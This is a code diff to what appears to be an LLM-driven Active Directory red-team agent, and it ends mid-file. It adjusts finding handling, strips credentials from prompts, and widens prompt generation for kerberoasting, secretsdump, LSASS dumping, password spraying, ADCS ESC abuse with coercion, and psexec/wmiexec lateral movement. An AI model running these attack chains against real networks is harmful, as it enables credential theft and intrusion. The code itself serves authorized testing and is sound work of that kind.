diff --git a/ares-llm/src/agent_loop/callbacks.rs b/ares-llm/src/agent_loop/callbacks.rs
index 28f11eec..4687ba77 100644
--- a/ares-llm/src/agent_loop/callbacks.rs
+++ b/ares-llm/src/agent_loop/callbacks.rs
@@ -61,10 +61,37 @@ pub(super) fn handle_builtin_callback(call: &ToolCall) -> Result<CallbackResult> {
                 .as_str()
                 .unwrap_or("")
                 .to_string();
-            info!(finding_type = %finding_type, "Finding reported: {description}");
-            Ok(CallbackResult::Continue(format!(
-                "Finding recorded: {finding_type}"
-            )))
+            let target = call.arguments["target"].as_str().unwrap_or("").to_string();
+            let severity = call.arguments["severity"]
+                .as_str()
+                .unwrap_or("info")
+                .to_string();
+            info!(finding_type = %finding_type, target = %target, severity = %severity, "Finding reported: {description}");
+
+            // Route into `llm_findings` (NOT `discoveries`). The LLM-asserted
+            // payload reaches reports for context but MUST NOT feed
+            // `publish_vulnerability` — only parser-produced discoveries do.
+ let vuln_id = if target.is_empty() { + format!("finding_{finding_type}") + } else { + format!("finding_{}_{}", finding_type, target.replace('.', "_")) + }; + let finding = serde_json::json!({ + "vulnerabilities": [{ + "vuln_id": vuln_id, + "vuln_type": finding_type, + "target": target, + "details": { + "description": description, + "severity": severity, + "discovered_by": "agent_report_finding", + }, + }] + }); + Ok(CallbackResult::LlmFinding { + response: format!("Finding recorded: {finding_type}"), + finding, + }) } "report_lateral_success" => { let target = call.arguments["target_ip"] @@ -77,9 +104,25 @@ pub(super) fn handle_builtin_callback(call: &ToolCall) -> Result .unwrap_or("") .to_string(); info!(target = %target, technique = %technique, "Lateral movement succeeded"); - Ok(CallbackResult::Continue(format!( - "Lateral movement recorded: {technique} → {target}" - ))) + + // Surface as an LLM finding only — does NOT feed `publish_vulnerability`. + let vuln_id = format!("lateral_success_{}_{}", technique, target.replace('.', "_")); + let finding = serde_json::json!({ + "vulnerabilities": [{ + "vuln_id": vuln_id, + "vuln_type": format!("lateral_{technique}"), + "target": target, + "details": { + "description": format!("Successful lateral movement via {technique}"), + "severity": "high", + "discovered_by": "agent_lateral_movement", + }, + }] + }); + Ok(CallbackResult::LlmFinding { + response: format!("Lateral movement recorded: {technique} → {target}"), + finding, + }) } "report_lateral_failed" => { let target = call.arguments["target_ip"] @@ -344,14 +387,18 @@ mod tests { fn report_finding() { let call = make_call( "report_finding", - serde_json::json!({"finding_type": "kerberoastable_account", "description": "Found SPN"}), + serde_json::json!({"finding_type": "kerberoastable_account", "description": "Found SPN", "target": "192.168.58.10"}), ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("kerberoastable_account")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("kerberoastable_account")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "kerberoastable_account"); + assert_eq!(vulns[0]["target"], "192.168.58.10"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } @@ -363,11 +410,14 @@ mod tests { ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("psexec")); - assert!(msg.contains("192.168.58.10")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("psexec")); + assert!(response.contains("192.168.58.10")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "lateral_psexec"); } - other => panic!("Expected Continue, got {other:?}"), + other => panic!("Expected LlmFinding, got {other:?}"), } } @@ -380,11 +430,13 @@ mod tests { ); let result = handle_builtin_callback(&call).unwrap(); match result { - CallbackResult::Continue(msg) => { - assert!(msg.contains("wmiexec")); - assert!(msg.contains("srv01.contoso.local")); + CallbackResult::LlmFinding { response, finding } => { + assert!(response.contains("wmiexec")); + assert!(response.contains("srv01.contoso.local")); + let vulns = finding["vulnerabilities"].as_array().unwrap(); + 
                assert_eq!(vulns[0]["vuln_type"], "lateral_wmiexec");
             }
-            other => panic!("Expected Continue, got {other:?}"),
+            other => panic!("Expected LlmFinding, got {other:?}"),
         }
     }
 
diff --git a/ares-llm/src/agent_loop/mod.rs b/ares-llm/src/agent_loop/mod.rs
index 0a44f3df..f06782f3 100644
--- a/ares-llm/src/agent_loop/mod.rs
+++ b/ares-llm/src/agent_loop/mod.rs
@@ -25,7 +25,7 @@ pub use runner::{run_agent_loop, HostnameMap};
 pub use session_log::{replay_messages, SessionLog};
 pub use types::{
     AgentLoopOutcome, CallbackHandler, CallbackResult, LoopEndReason, ToolDispatcher,
-    ToolExecResult,
+    ToolExecResult, ToolOutput,
 };
 
 mod types;
diff --git a/ares-llm/src/agent_loop/runner.rs b/ares-llm/src/agent_loop/runner.rs
index 72ab7db9..f2962921 100644
--- a/ares-llm/src/agent_loop/runner.rs
+++ b/ares-llm/src/agent_loop/runner.rs
@@ -127,7 +127,8 @@ pub async fn run_agent_loop(
     let mut steps: u32 = 0;
     let mut tool_calls_dispatched: u32 = 0;
     let mut all_discoveries: Vec<serde_json::Value> = Vec::new();
-    let mut all_tool_outputs: Vec<String> = Vec::new();
+    let mut all_llm_findings: Vec<serde_json::Value> = Vec::new();
+    let mut all_tool_outputs: Vec<crate::ToolOutput> = Vec::new();
 
     // Dynamic tool filtering: track unavailable tools and per-tool call counts
     // to prevent infinite retry loops on missing binaries and runaway tool calls.
@@ -146,6 +147,7 @@
             total_usage,
             tool_calls_dispatched,
             all_discoveries,
+            all_llm_findings,
             all_tool_outputs,
         );
     }
@@ -170,6 +172,7 @@
             total_usage,
             tool_calls_dispatched,
             all_discoveries,
+            all_llm_findings,
             all_tool_outputs,
         );
     }
@@ -227,6 +230,7 @@
             total_usage,
             tool_calls_dispatched,
             all_discoveries,
+            all_llm_findings,
             all_tool_outputs,
         );
     }
@@ -263,6 +267,7 @@
             total_usage,
             tool_calls_dispatched,
             all_discoveries,
+            all_llm_findings,
             all_tool_outputs,
         );
     }
@@ -274,6 +279,7 @@
             total_usage,
             tool_calls_dispatched,
             all_discoveries,
+            all_llm_findings,
             all_tool_outputs,
         );
     }
@@ -404,8 +410,17 @@
         let output =
             truncate_tool_output(&dr.output, config.context.max_tool_output_chars);
 
-        // Collect raw tool output for secondary regex extraction
-        all_tool_outputs.push(dr.output.clone());
+        // Collect raw tool output (with tool name + args) for secondary
+        // regex extraction. Tool-aware extractors use the args to skip
+        // patterns that would misclassify echoed inputs (e.g. nxc -H
+        // echoes the hash on the same `[+] DOMAIN\user:secret` line that
+        // password-auth would emit, so the secret must not be ingested
+        // as a credential when args carry hash flags).
+ all_tool_outputs.push(crate::ToolOutput { + name: call.name.clone(), + arguments: call.arguments.clone(), + output: dr.output.clone(), + }); let tr = ChatMessage::tool_result(&call.id, &output); if session_log.enabled() { session_log.record_message(steps, &tr); @@ -551,6 +566,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -563,6 +579,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -573,6 +590,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call_id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result( &call_id, @@ -625,6 +646,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -637,6 +659,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -647,6 +670,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call.id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result(&call.id, format!("Callback error: {e}")); @@ -697,6 +724,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -709,6 +737,7 @@ pub async fn run_agent_loop( total_usage, tool_calls_dispatched, all_discoveries, + all_llm_findings, all_tool_outputs, ); } @@ -719,6 +748,10 @@ pub async fn run_agent_loop( } messages.push(tr); } + Ok(CallbackResult::LlmFinding { response, finding }) => { + all_llm_findings.push(finding); + messages.push(ChatMessage::tool_result(&call.id, &response)); + } Err(e) => { let tr = ChatMessage::tool_result(&call.id, format!("Callback error: {e}")); if session_log.enabled() { @@ -734,6 +767,7 @@ pub async fn run_agent_loop( /// Centralized exit path: writes the terminal `outcome` record to the /// session log and assembles the `AgentLoopOutcome`. 
+#[allow(clippy::too_many_arguments)]
 fn finish(
     session_log: &SessionLog,
     steps: u32,
@@ -741,7 +775,8 @@ fn finish(
     total_usage: TokenUsage,
     tool_calls_dispatched: u32,
     discoveries: Vec<serde_json::Value>,
-    tool_outputs: Vec<String>,
+    llm_findings: Vec<serde_json::Value>,
+    tool_outputs: Vec<crate::ToolOutput>,
 ) -> AgentLoopOutcome {
     if session_log.enabled() {
         let (label, detail) = describe_reason(&reason);
@@ -753,6 +788,7 @@
         steps,
         tool_calls_dispatched,
         discoveries,
+        llm_findings,
         tool_outputs,
     }
 }
diff --git a/ares-llm/src/agent_loop/tests.rs b/ares-llm/src/agent_loop/tests.rs
index e9bdec6c..f683be0b 100644
--- a/ares-llm/src/agent_loop/tests.rs
+++ b/ares-llm/src/agent_loop/tests.rs
@@ -57,10 +57,12 @@ fn handle_report_finding_callback() {
     };
     let result = handle_builtin_callback(&call).unwrap();
     match result {
-        CallbackResult::Continue(msg) => {
-            assert!(msg.contains("smb_signing_disabled"));
+        CallbackResult::LlmFinding { response, finding } => {
+            assert!(response.contains("smb_signing_disabled"));
+            let vulns = finding["vulnerabilities"].as_array().unwrap();
+            assert_eq!(vulns[0]["vuln_type"], "smb_signing_disabled");
         }
-        _ => panic!("Expected Continue"),
+        _ => panic!("Expected LlmFinding"),
     }
 }
diff --git a/ares-llm/src/agent_loop/types.rs b/ares-llm/src/agent_loop/types.rs
index 9c3bf8bf..71baea5a 100644
--- a/ares-llm/src/agent_loop/types.rs
+++ b/ares-llm/src/agent_loop/types.rs
@@ -13,6 +13,18 @@ pub struct ToolExecResult {
     pub discoveries: Option<serde_json::Value>,
 }
 
+/// Raw stdout from a single tool dispatch, paired with the tool name and
+/// arguments that produced it. Carried through `AgentLoopOutcome` so secondary
+/// regex extractors downstream can be tool-aware (e.g. skip `[+] DOMAIN\user:secret`
+/// credential extraction when the tool was invoked with hash-auth flags — the
+/// "secret" is just the hash echoed back, not a discovered password).
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct ToolOutput {
+    pub name: String,
+    pub arguments: serde_json::Value,
+    pub output: String,
+}
+
 /// Trait for dispatching tool calls to external executors (Python workers).
 ///
 /// Implementers handle the Redis queue mechanics (LPUSH to tool_exec queue,
@@ -40,6 +52,14 @@ pub enum CallbackResult {
     RequestAssistance { issue: String, context: String },
     /// Callback processed, continue the loop with this response.
     Continue(String),
+    /// LLM-fabricated finding — continue the loop and route the structured
+    /// payload into `llm_findings` (NOT `discoveries`). Reports may surface
+    /// these for context, but they MUST NOT feed `publish_*` state writes;
+    /// only parser-produced discoveries are authoritative.
+    LlmFinding {
+        response: String,
+        finding: serde_json::Value,
+    },
 }
 
 /// Trait for providing custom callback handlers to the agent loop.
@@ -78,9 +98,15 @@ pub struct AgentLoopOutcome {
     /// Number of tool calls dispatched.
     pub tool_calls_dispatched: u32,
     /// Accumulated structured discoveries from all tool results.
+    /// Only parser-produced — never LLM-fabricated. Safe to feed into
+    /// `extract_discoveries` → `publish_*`.
     pub discoveries: Vec<serde_json::Value>,
-    /// Raw tool output strings for secondary regex extraction.
-    pub tool_outputs: Vec<String>,
+    /// LLM-fabricated findings (`report_finding` / `report_lateral_success`).
+    /// Surfaced in reports but never used as authoritative state — must never
+    /// feed `publish_*` calls.
+    pub llm_findings: Vec<serde_json::Value>,
+    /// Raw tool outputs (name + args + stdout) for secondary regex extraction.
+    pub tool_outputs: Vec<ToolOutput>,
 }
 
 /// Why the agent loop stopped.
diff --git a/ares-llm/src/lib.rs b/ares-llm/src/lib.rs
index 5e443254..8ce383ee 100644
--- a/ares-llm/src/lib.rs
+++ b/ares-llm/src/lib.rs
@@ -12,5 +12,5 @@ pub use provider::{
 pub use agent_loop::{
     replay_messages, run_agent_loop, AgentLoopConfig, AgentLoopOutcome, BudgetConfig,
     CallbackHandler, CallbackResult, ContextConfig, HostnameMap, LoopEndReason, RetryConfig,
-    SessionLog, SessionLogConfig, ToolDispatcher, ToolExecResult,
+    SessionLog, SessionLogConfig, ToolDispatcher, ToolExecResult, ToolOutput,
 };
diff --git a/ares-llm/src/prompt/acl.rs b/ares-llm/src/prompt/acl.rs
index 053c9f23..d1c15ed1 100644
--- a/ares-llm/src/prompt/acl.rs
+++ b/ares-llm/src/prompt/acl.rs
@@ -4,7 +4,7 @@ use serde_json::Value;
 use tera::Context;
 
 use super::helpers::insert_state_context;
-use super::templates::{render_template_with_context, TASK_ACL_ANALYSIS};
+use super::templates::{render_template_with_context, TASK_ACL_ANALYSIS, TASK_ACL_CHAIN_STEP};
 use super::StateSnapshot;
 
 pub(crate) fn generate_acl_analysis_prompt(
@@ -26,3 +26,81 @@
 
     render_template_with_context(TASK_ACL_ANALYSIS, &ctx)
 }
+
+/// Render an `acl_chain_step` prompt.
+///
+/// Two payload shapes are supported:
+/// 1. Flat fields from `auto_dacl_abuse` (acl_type / source_user / target_user /
+///    target_ip / domain / vuln_id / credential).
+/// 2. Nested `step` object from `auto_acl_chain_follow` (raw BloodHound
+///    step). Best-effort extraction of source/target/domain/dc_ip from the
+///    step keys, falling back to the credential domain.
+pub(crate) fn generate_acl_chain_step_prompt(
+    task_id: &str,
+    payload: &Value,
+    state: Option<&StateSnapshot>,
+) -> anyhow::Result<String> {
+    let mut ctx = Context::new();
+    ctx.insert("task_id", task_id);
+
+    let credential = payload.get("credential");
+    let cred_username = credential
+        .and_then(|c| c.get("username"))
+        .and_then(|v| v.as_str());
+    let cred_domain = credential
+        .and_then(|c| c.get("domain"))
+        .and_then(|v| v.as_str());
+
+    let step = payload.get("step");
+
+    let pick_str = |keys: &[&str]| -> Option<String> {
+        for k in keys {
+            if let Some(v) = payload.get(*k).and_then(|v| v.as_str()) {
+                return Some(v.to_string());
+            }
+            if let Some(s) = step {
+                if let Some(v) = s.get(*k).and_then(|v| v.as_str()) {
+                    return Some(v.to_string());
+                }
+            }
+        }
+        None
+    };
+
+    if let Some(v) = pick_str(&["acl_type", "edge_type", "edge", "right"]) {
+        ctx.insert("acl_type", &v);
+    }
+    let source_user =
+        pick_str(&["source_user", "source", "from"]).or_else(|| cred_username.map(String::from));
+    if let Some(ref v) = source_user {
+        ctx.insert("source_user", v);
+    }
+    let source_domain =
+        pick_str(&["source_domain", "domain"]).or_else(|| cred_domain.map(String::from));
+    if let Some(ref v) = source_domain {
+        ctx.insert("source_domain", v);
+    }
+    if let Some(v) = pick_str(&["target_user", "target", "to"]) {
+        ctx.insert("target_user", &v);
+    }
+    if let Some(v) = pick_str(&["domain"]).or_else(|| cred_domain.map(String::from)) {
+        ctx.insert("domain", &v);
+    }
+    if let Some(v) = pick_str(&["target_ip", "dc_ip", "target"]) {
+        ctx.insert("dc_ip", &v);
+    }
+    if let Some(v) = pick_str(&["vuln_id"]) {
+        ctx.insert("vuln_id", &v);
+    }
+
+    if let Some(s) = step {
+        ctx.insert(
+            "step_json",
+            &serde_json::to_string_pretty(s).unwrap_or_default(),
+        );
+    }
+
+    insert_state_context(&mut ctx, state, "acl_chain_step", None);
+
+    render_template_with_context(TASK_ACL_CHAIN_STEP, &ctx)
+}
diff --git a/ares-llm/src/prompt/blue.rs b/ares-llm/src/prompt/blue.rs
index 6d2b579c..5bf24702
100644 --- a/ares-llm/src/prompt/blue.rs +++ b/ares-llm/src/prompt/blue.rs @@ -349,6 +349,10 @@ mod tests { use super::*; use serde_json::json; + // ----------------------------------------------------------------------- + // generate_blue_task_prompt + // ----------------------------------------------------------------------- + #[test] fn generate_blue_task_prompt_returns_none_for_unknown_type() { let params = json!({}); @@ -397,6 +401,10 @@ mod tests { assert!(generate_blue_task_prompt("host_investigation", "t-7", ¶ms, "state").is_some()); } + // ----------------------------------------------------------------------- + // blue_role_template + // ----------------------------------------------------------------------- + #[test] fn role_template_triage() { assert_eq!( @@ -445,6 +453,10 @@ mod tests { ); } + // ----------------------------------------------------------------------- + // build_blue_system_prompt + // ----------------------------------------------------------------------- + #[test] fn system_prompt_succeeds_for_triage() { let caps = vec!["query_loki".to_string(), "record_evidence".to_string()]; @@ -505,6 +517,10 @@ mod tests { assert!(!result.is_empty()); } + // ----------------------------------------------------------------------- + // build_initial_alert_prompt + // ----------------------------------------------------------------------- + #[test] fn initial_alert_prompt_extracts_alert_name_from_labels() { let alert = json!({ diff --git a/ares-llm/src/prompt/credential_access/generic.rs b/ares-llm/src/prompt/credential_access/generic.rs index befe262f..2bb29cd6 100644 --- a/ares-llm/src/prompt/credential_access/generic.rs +++ b/ares-llm/src/prompt/credential_access/generic.rs @@ -1,11 +1,16 @@ //! Generic fallback and technique-with-credentials prompt branches. +//! +//! These prompts MUST NOT inline credential values into example tool-call +//! signatures. The worker resolves credentials at dispatch time from operation +//! state. The LLM only sees principal-only signatures (target, username, +//! domain, dc_ip) and a non-secret capability label. use std::collections::HashMap; use serde_json::Value; use tera::Context; -use crate::prompt::helpers::{cred_display_str, cred_param_str, insert_state_context}; +use crate::prompt::helpers::{cred_capability_label, insert_state_context}; use crate::prompt::templates::{ render_template_with_context, TASK_CREDACCESS_FALLBACK, TASK_CREDACCESS_WITH_CREDS, }; @@ -28,63 +33,57 @@ pub(super) fn try_generate_with_creds( let dc_ip = p.dc_ip; let domain = p.domain; let username = p.username; - let cred_param = cred_param_str(payload, p.hash_value); - let cred_display = cred_display_str(payload, p.hash_value); + let cred_capability = cred_capability_label(payload, p.hash_value); + // Example signatures show only LLM-callable fields; the worker injects + // password/hash/aes/ticket from state at dispatch time. 
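To make the principal-only rule concrete, a standalone sketch of what one rendered signature reduces to after this change; the interpolated values are illustrative:

```rust
fn main() {
    let (dc_ip, username, domain) = ("192.168.58.10", "alice", "contoso.local");
    // The old shape inlined password='...' or hashes='...' between the
    // username and domain; the new shape has no credential slot at all,
    // so there is nothing to leak into the LLM-facing prompt.
    let signature =
        format!("kerberoast(domain='{domain}', username='{username}', dc_ip='{dc_ip}')");
    assert!(!signature.contains("password="));
    assert!(!signature.contains("hashes="));
}
```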
let technique_map: HashMap<&str, String> = [ ( "sysvol_script_search", format!( - "sysvol_script_search(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "sysvol_script_search(target='{dc_ip}', username='{username}', domain='{domain}') \ - ~2 seconds, finds hardcoded passwords in login scripts" ), ), ( "gpp_password_finder", format!( - "gpp_password_finder(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "gpp_password_finder(target='{dc_ip}', username='{username}', domain='{domain}') \ - ~2 seconds, finds GPP/cpassword credentials" ), ), ( "ldap_search_descriptions", format!( - "ldap_search_descriptions(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "ldap_search_descriptions(target='{dc_ip}', username='{username}', domain='{domain}') \ - finds passwords in LDAP description fields" ), ), ( "kerberoast", format!( - "kerberoast(domain='{domain}', username='{username}', \ - {cred_param}, dc_ip='{dc_ip}') \ + "kerberoast(domain='{domain}', username='{username}', dc_ip='{dc_ip}') \ - service account hashes (uses correct DC for the domain)" ), ), ( "secretsdump", format!( - "secretsdump(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "secretsdump(target='{dc_ip}', username='{username}', domain='{domain}') \ - dump hashes (requires admin)" ), ), ( "lsassy", format!( - "lsassy(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "lsassy(target='{dc_ip}', username='{username}', domain='{domain}') \ - LSASS memory dump" ), ), ( "laps_dump", format!( - "laps_dump(target='{dc_ip}', username='{username}', \ - {cred_param}, domain='{domain}') \ + "laps_dump(target='{dc_ip}', username='{username}', domain='{domain}') \ - LAPS local admin passwords" ), ), @@ -107,7 +106,7 @@ pub(super) fn try_generate_with_creds( } let targets_display = if p.targets.is_empty() { - "N/A".to_string() + "(none)".to_string() } else { p.targets.join(", ") }; @@ -117,14 +116,18 @@ pub(super) fn try_generate_with_creds( ctx.insert("domain", domain); ctx.insert( "dc_ip_display", - if dc_ip.is_empty() { "N/A" } else { dc_ip }, + if dc_ip.is_empty() { "(unset)" } else { dc_ip }, ); ctx.insert("targets_display", &targets_display); ctx.insert( "user_display", - if username.is_empty() { "N/A" } else { username }, + if username.is_empty() { + "(unset)" + } else { + username + }, ); - ctx.insert("cred_display", &cred_display); + ctx.insert("cred_capability", cred_capability); ctx.insert("instructions_text", &instructions.join("\n")); insert_state_context(&mut ctx, state, "credential_access", Some(dc_ip)); @@ -147,7 +150,7 @@ pub(super) fn generate_fallback( "password" } else if p.has_hash { if p.hash_is_pth { - "hash" + "nthash" } else { "hash (non-NTLM)" } @@ -160,11 +163,6 @@ pub(super) fn generate_fallback( } else { "" }; - let cred_value = if p.has_password { - p.password - } else { - p.hash_value.unwrap_or("N/A") - }; let source = payload .get("credential_source") .and_then(|v| v.as_str()) @@ -179,7 +177,7 @@ pub(super) fn generate_fallback( p.techniques.join(", ") }; let targets_display = if p.targets.is_empty() { - "N/A".to_string() + "(none)".to_string() } else { p.targets.join(", ") }; @@ -190,18 +188,17 @@ pub(super) fn generate_fallback( ctx.insert("targets_display", &targets_display); ctx.insert( "dc_ip_display", - if dc_ip.is_empty() { "N/A" } else { dc_ip }, + if dc_ip.is_empty() { "(unset)" } else { dc_ip }, ); ctx.insert( "user_display", if p.username.is_empty() 
{ - "N/A" + "(unset)" } else { p.username }, ); ctx.insert("cred_type", cred_type); - ctx.insert("cred_value", cred_value); ctx.insert("techniques_display", &techniques_display); if !hash_type.is_empty() { ctx.insert("hash_type", hash_type); diff --git a/ares-llm/src/prompt/credential_access/low_hanging.rs b/ares-llm/src/prompt/credential_access/low_hanging.rs index 17a71d63..0a535b32 100644 --- a/ares-llm/src/prompt/credential_access/low_hanging.rs +++ b/ares-llm/src/prompt/credential_access/low_hanging.rs @@ -55,6 +55,9 @@ pub(super) fn generate_without_creds( "dc_ip_display", if dc_ip.is_empty() { "N/A" } else { dc_ip }, ); + if !p.excluded_users.is_empty() { + ctx.insert("excluded_users", p.excluded_users); + } insert_state_context(&mut ctx, state, "credential_access", Some(dc_ip)); render_template_with_context(TASK_CREDACCESS_LOW_HANGING_NO_CREDS, &ctx) diff --git a/ares-llm/src/prompt/credential_access/mod.rs b/ares-llm/src/prompt/credential_access/mod.rs index 4f38267c..c068268c 100644 --- a/ares-llm/src/prompt/credential_access/mod.rs +++ b/ares-llm/src/prompt/credential_access/mod.rs @@ -34,6 +34,11 @@ pub(crate) struct Params<'a> { pub has_password: bool, pub has_hash: bool, pub has_creds: bool, + /// Comma-separated list of usernames that are quarantined (locked out) + /// in this domain. The orchestrator extracts these from prior lockout + /// observations and passes them through so spray prompts instruct the + /// LLM to skip them and the worker tool drops them from the wordlist. + pub excluded_users: &'a str, } pub(crate) fn generate_credential_access_prompt( @@ -73,9 +78,23 @@ pub(crate) fn generate_credential_access_prompt( .or_else(|| payload.get("target_ip")) .and_then(|v| v.as_str()) .unwrap_or(""); - let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); - // Read from nested "credential" object first (dispatchers nest it), flat fallback + // Read from nested "credential" object first (dispatchers nest it), flat fallback. + // Domain falls back to `credential.domain` so secretsdump dispatches that + // only nest the auth realm (request_secretsdump / request_secretsdump_hash) + // still surface a real domain in the prompt. Without this fallback the + // template emits `domain=''`, the LLM faithfully calls the tool with an + // empty realm, and downstream auth fails STATUS_LOGON_FAILURE. 
let cred_obj = payload.get("credential"); + let domain = payload + .get("domain") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + .or_else(|| { + cred_obj + .and_then(|c| c.get("domain")) + .and_then(|v| v.as_str()) + }) + .unwrap_or(""); let username = cred_obj .and_then(|c| c.get("username")) .and_then(|v| v.as_str()) @@ -87,6 +106,10 @@ pub(crate) fn generate_credential_access_prompt( .or_else(|| payload.get("password").and_then(|v| v.as_str())) .unwrap_or(""); let reason = payload.get("reason").and_then(|v| v.as_str()).unwrap_or(""); + let excluded_users = payload + .get("excluded_users") + .and_then(|v| v.as_str()) + .unwrap_or(""); let ticket_path = payload.get("ticket_path").and_then(|v| v.as_str()); let no_pass = payload @@ -112,6 +135,7 @@ pub(crate) fn generate_credential_access_prompt( has_password, has_hash, has_creds, + excluded_users, }; // Branch 1: Kerberos ticket-based secretsdump diff --git a/ares-llm/src/prompt/credential_access/spray.rs b/ares-llm/src/prompt/credential_access/spray.rs index 5fdf6edf..b4c92473 100644 --- a/ares-llm/src/prompt/credential_access/spray.rs +++ b/ares-llm/src/prompt/credential_access/spray.rs @@ -50,6 +50,9 @@ pub(super) fn try_generate( if !cred_line.is_empty() { ctx.insert("cred_line", &cred_line); } + if !p.excluded_users.is_empty() { + ctx.insert("excluded_users", p.excluded_users); + } insert_state_context(&mut ctx, state, "credential_access", Some(dc_ip)); Some(render_template_with_context(TASK_CREDACCESS_SPRAY, &ctx)) diff --git a/ares-llm/src/prompt/exploit/adcs.rs b/ares-llm/src/prompt/exploit/adcs.rs index 02b377dd..2c9b4ef5 100644 --- a/ares-llm/src/prompt/exploit/adcs.rs +++ b/ares-llm/src/prompt/exploit/adcs.rs @@ -42,7 +42,7 @@ pub(crate) fn generate_adcs_enumerate_prompt( render_template_with_context(TASK_EXPLOIT_ADCS_ENUMERATE, &ctx) } -/// Generate prompt for ADCS ESC1/ESC4/ESC8 exploitation tasks. +/// Generate prompt for ADCS ESC exploitation tasks. 
pub(crate) fn generate_adcs_esc_prompt( task_id: &str, payload: &Value, @@ -51,22 +51,72 @@ domain: &str, vuln_type: &str, ) -> anyhow::Result<String> { + // CA server: try ca_server, ca_host, target_ip, then fall back to target let ca_server = payload .get("ca_server") + .or_else(|| payload.get("ca_host")) + .or_else(|| payload.get("target_ip")) .and_then(|v| v.as_str()) .unwrap_or(target); + let ca_name = payload + .get("ca_name") + .and_then(|v| v.as_str()) + .unwrap_or(""); let template = payload .get("template") .and_then(|v| v.as_str()) .unwrap_or(""); + let username = payload + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let password = payload + .get("password") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let dc_ip = payload.get("dc_ip").and_then(|v| v.as_str()).unwrap_or(""); + let admin_sid = payload + .get("admin_sid") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let instructions = payload + .get("instructions") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let coerce_target = payload + .get("coerce_target") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let coerce_targets: Vec<String> = payload + .get("coerce_targets") + .and_then(|v| v.as_array()) + .map(|arr| { + arr.iter() + .filter_map(|v| v.as_str().map(String::from)) + .collect() + }) + .unwrap_or_default(); + let listener_ip = payload + .get("listener_ip") + .and_then(|v| v.as_str()) + .unwrap_or(""); let vt_lower = vuln_type.to_lowercase(); let mut ctx = Context::new(); ctx.insert("task_id", task_id); ctx.insert("ca_server", ca_server); + ctx.insert("ca_name", ca_name); ctx.insert("template", template); ctx.insert("domain", domain); + ctx.insert("username", username); + ctx.insert("password", password); + ctx.insert("dc_ip", dc_ip); + ctx.insert("admin_sid", admin_sid); + ctx.insert("instructions", instructions); + ctx.insert("coerce_target", coerce_target); + ctx.insert("coerce_targets", &coerce_targets); + ctx.insert("listener_ip", listener_ip); ctx.insert("vuln_upper", &vuln_type.to_uppercase()); ctx.insert("is_esc8", &vt_lower.contains("esc8")); insert_state_context(&mut ctx, state, "exploit", Some(target)); diff --git a/ares-llm/src/prompt/exploit/mod.rs b/ares-llm/src/prompt/exploit/mod.rs index bbc554d7..ab5de3df 100644 --- a/ares-llm/src/prompt/exploit/mod.rs +++ b/ares-llm/src/prompt/exploit/mod.rs @@ -87,9 +87,9 @@ pub(crate) fn generate_exploit_prompt( ); } - // ADCS ESC1 / ESC4 / ESC8 + // ADCS ESC exploitation (all ESC types) let vt_lower = vuln_type.to_lowercase(); - if vt_lower.contains("esc1") || vt_lower.contains("esc4") || vt_lower.contains("esc8") { + if vt_lower.contains("esc") { return adcs::generate_adcs_esc_prompt(task_id, payload, state, target, domain, vuln_type); } diff --git a/ares-llm/src/prompt/exploit/trust.rs b/ares-llm/src/prompt/exploit/trust.rs index 245f9ed9..13203221 100644 --- a/ares-llm/src/prompt/exploit/trust.rs +++ b/ares-llm/src/prompt/exploit/trust.rs @@ -1,4 +1,10 @@ //! Trust key extraction and cross-forest exploitation prompt generation. +//! +//! NOTE: This generator MUST NOT inject credential values into the rendered +//! prompt. Source-domain DA password/hash, trust keys, child krbtgt hashes, +//! and SIDs all live in operation state and are auto-resolved by the worker +//! at dispatch time. The template only sees principal-only fields and +//! capability flags (`has_source_da`, `has_trust_key`, `has_child_krbtgt`).
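A compact sketch of the presence-check pattern that NOTE prescribes: payload fields are collapsed to a non-secret label before anything reaches the template. The field names match the payload shape used below; the hash value is illustrative:

```rust
use serde_json::{json, Value};

fn present(payload: &Value, key: &str) -> bool {
    payload
        .get(key)
        .and_then(Value::as_str)
        .map(|s| !s.is_empty())
        .unwrap_or(false)
}

fn main() {
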